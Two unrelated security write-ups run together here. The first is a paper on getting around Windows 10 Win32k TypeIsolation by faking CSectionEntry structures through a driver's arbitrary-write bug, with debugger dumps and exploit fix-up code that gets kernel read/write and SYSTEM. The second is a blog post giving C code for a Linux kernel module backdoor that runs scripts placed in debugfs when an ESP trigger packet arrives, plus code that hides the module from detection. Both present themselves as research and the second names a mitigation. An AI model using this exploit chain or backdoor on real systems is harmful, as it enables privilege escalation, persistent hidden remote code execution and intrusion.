Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploit of GDI objects to complete arbitrary memory address R/W in kernel exploitation has become more and more useful. In many types of vulnerabilityes such as pool overflow, arbitrary writes, and out-of-bound write, use after free and double free, you can use GDI objects to read and write arbitrary memory. We call this GDI data-only attack.

Microsoft introduced the win32k type isolation after the Windows 10 build 1709 release to mitigate GDI data-only attack in kernel exploitation. I discovered a mistake in Win32k TypeIsolation when I reverse win32kbase.sys. It have resulted GDI data-only attack worked again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

GDI data-only attack is one of the common methods which used in kernel exploitation. Modify GDI object member-variables by common vulnerabilities, you can use the GDI API in win32k to complete arbitrary memory read and write. At present, two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


Typedef struct _SURFOBJ {

DHSURF dhsurf;

HSURF hsurf;

DHPDEV dhpdev;

HDEV hdev;

SIZEL sizlBitmap;

ULONG cjBits;

PVOID pvBits;

PVOID pvScan0;

LONG lDelta;

ULONG iUniq;

ULONG iBitmapFormat;

USHORT iType;

USHORT fjBitmap;

} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


Typedef struct _PALETTE64

{

BASEOBJECT64 BaseObject;

FLONG flPal;

ULONG32 cEntries;

ULONG32 ulTime;

HDC hdcHead;

ULONG64 hSelected;

ULONG64 cRefhpal;

ULONG64 cRefRegular;

ULONG64 ptransFore;

ULONG64 ptransCurrent;

ULONG64 ptransOld;

ULONG32 unk_038;

ULONG64 pfnGetNearest;

ULONG64 pfnGetMatch;

ULONG64 ulRGBTime;

ULONG64 pRGBXlate;

PALETTEENTRY *pFirstColor;

Struct _PALETTE *ppalThis;

PALETTEENTRY apalColors[3];

}

In the kernel structure of Bitmap and Palette, two important member-variables related to GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Two member-variables point to Bitmap and Palette’s data field, and you can read or write data from data field through the GDI APIs. As long as we modify two member-variables to any memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write arbitrary memory address.

About using the Bitmap and Palette to complete the GDI data-only attack Now that there are many related technical papers on the Internet, and it is not the focus of this paper, there will be no more deeply sharing. The relevant information can refer to the fifth part.

3 Win32k TypeIsolation

The exploit of GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common types of vulnerabilities. Microsoft has added a new mitigation after Windows 10 rs3 build 1709 —- Win32k Typeisolation, which manages the GDI objects through a doubly-linked list, and separates the head of the GDI object from the data field. This is not only mitigate the exploit of pool fengshui which create a predictable pool and uses a GDI object to occupy the pool hole and modify member-variables by vulnerabilities. but also mitigate attack scenario which modifies other member-variables of GDI object header to increase the controllable range of the data field, because the head and data field is no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer,and BitmapBuffer is used to record the status of the view field, which is 0 for idle and 1 for in use. When applying for a GDI object, it starts traversing the CSectionEntry list through win32kbase!gpTypeIsolation and checks whether the current view field contains a free memory by CSectionBitmapAllocator. If there is a free memory, a new GDI object header will be placed in the view field.

I did some research in the reverse engineering of the implementation of GDI object allocation and release about the CTypeIsolation class and the CSectionEntry class, and then I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE which stored in the view field, but does not check the validity of CSectionEntry->view and CSectionEntry->bitmap_allocator pointers, that is to say if we can construct a fake view and fake bitmap_allocator, and we can use the vulnerability to modify CSectionEntry->view and CSectionEntry->bitmap_allocator to point to fake struct, we can re-use GDI object to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of ​​this attack scenario. HEVD is a practice driver developed by Hacksysteam that has typical kernel vulnerabilities. There is an Arbitrary Write vulnerability in HEVD. We use this vulnerability as example to share my attack scenario.

Attack scenario:

First look at the allocation of CSectionEntry, CSectionEntry will allocate 0x40 size session paged pool, CSectionEntry allocate pool memory implementation in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use the pool fengshui to create a predictable session paged pool hole and it will be occupied with CSectionEntry. Therefore, in the exploit scenario of HEVD Arbitrary write, we use the tagWND to create a stable pool hole. , and use the HMValidateHandle to leak tagWND kernel object address. Because the current vulnerability instance is an arbitrary write vulnerability, if we can reveal the address of the kernel object, it will facilitate our understanding of this attack scenario, of course, in many attack scenarios, we only need to use pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8```

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to create the CSecitionEntry to occupy 0xffff862e827ca220. This requires the use of a feature of TypeIsolation. As mentioned in the second section, when the GDI object is requested, it will traverse the CSectionEntry and determine whether there is any free in the view field, if the view field of the CSectionEntry is full, the traversal will continue to the next CSectionEntry, but if CTypeIsolation doubly linked list, all the view fields of the CSectionEntrys are full, then NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, we allocate a large number of GDI objects after we have finished creating the pool hole to fill up all the CSectionEntry’s view fields to ensure that a new CSectionEntry is created and occupy a pool hole of size 0x40.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view field of the new CSectionEntry that was created when we allocate a large number of GDI objects may already be full or partially full by SURFACEs. If we construct the fake struct to construct the view field as empty, then we can deceive TypeIsolation that GDI object will place SURFACE in a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field, 0x1c0000 points to CSectionBitmapAllocator, and the fake view field is used to store the GDI object. The structure of CSectionBitmapAllocator needs thoughtful construction because we need to use it to deceive the typeisolation that the CSectionEntry we control is a free view item.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

The above CSectionBitmapAllocator structure compares with 0x1c0000 structure, and I defined xor_key as 0xdeadbeefdeadb33f, as long as the xor_key ^ xor_view and xor_key ^ xor_rtl_bitmap operation point to the view field and RTL_BITMAP. In the debugging I found that the pushlock must point to a valid structure pointer, otherwise it will trigger BUGCHECK, so I allocate memory 0x1e0000 to store pushlock content.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I select a valid RTL_BITMAP as a template, where the first member-variable represents the RTL_BITMAP size, the second member-variable points to the bitmap_buffer, and the immediately adjacent bitmap_buffer represents the state of the view field in bits. To deceive typeisolation, we will all of them are set to 0, indicating that the view field of the current CSectionEntry item is all idle, referring to the 0x190000 fake RTL_BITMAP structure.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g / / trigger vulnerability, CSectionEntry-> view and CSectionEntry-> bitmap_allocator is modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

In the course of completing the exploit, I discovered that BSOD was generated some time, which greatly reduced the stability of the GDI data-only attack. For example,


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After many tracking, I discovered that the main reason for BSOD is that the fake struct we created when using VirtualAllocEx is located in the process space of our current process. This space is not shared by other processes, that is, if we modify the view field through a vulnerability. After the pointer to the CSectionBitmapAllocator, when other processes create the GDI object, it will also traverse the CSecitionEntry. When traversing to the CSectionEntry we modify through the vulnerability, it will generate BSoD because the address space of the process is invalid, so here I did my first fix when the vulnerability was triggered finish.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified the bitmap_hint_index and the rtl_bitmap to deceive the typeisolation when traverse the CSectionEntry and think that the view field of the fake CSectionEntry is currently full and will skip this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even if we end the exploit exit process, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, and when our process exits, The current process space allocated by VirtualAllocEx will be released. This will lead to a lot of unknown errors. We have already had the ability to read and write at any address. So I did my second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSePrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next, which unlinks the current CSectionEntry so that when the GDI object allocates traversal CSectionEntry, it will  deal with fake CSectionEntry no longer.

After completing the two fixes, you can successfully use GDI data-only attack to complete any memory address read and write. Here, I directly obtained the SYSTEM permissions for the latest version of Windows10 rs3, but once again when the process completely exits, it triggers BSoD. After the analysis, I found that this BSoD is due to the unlink after, the GDI handle is still stored in the GDI handle table, then it will find the corresponding kernel object in CSectionEntry and free away, and we store the bitmap kernel object CSectionEntry has been unlink, Caused the occurrence of BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object in the GDI handle table. We need to find the HBITMAP which stored in the fake view in the GDI handle table, and set it to 0x0. This will skip the subsequent free processing in bDeleteSurface. Then call HmgNextOwned to release the next GDI object. The key code for finding the location of HBITMAP in the GDI handle table is in HmgSharedLockCheck. The key code is as follows:


V4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 *((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8 )v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning here is the need to leak the base address of win32kbase.sys, in the case of Low IL, we need vulnerability to leak info. And I use NtQuerySystemInformation in Medium IL to leak win32kbase.sys base address to calculate the gpHandleManager address, after Find the position of the target bitmap object in the GDI handle table in the fake view, and set it to 0x0. Finally complete the full exploit.

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

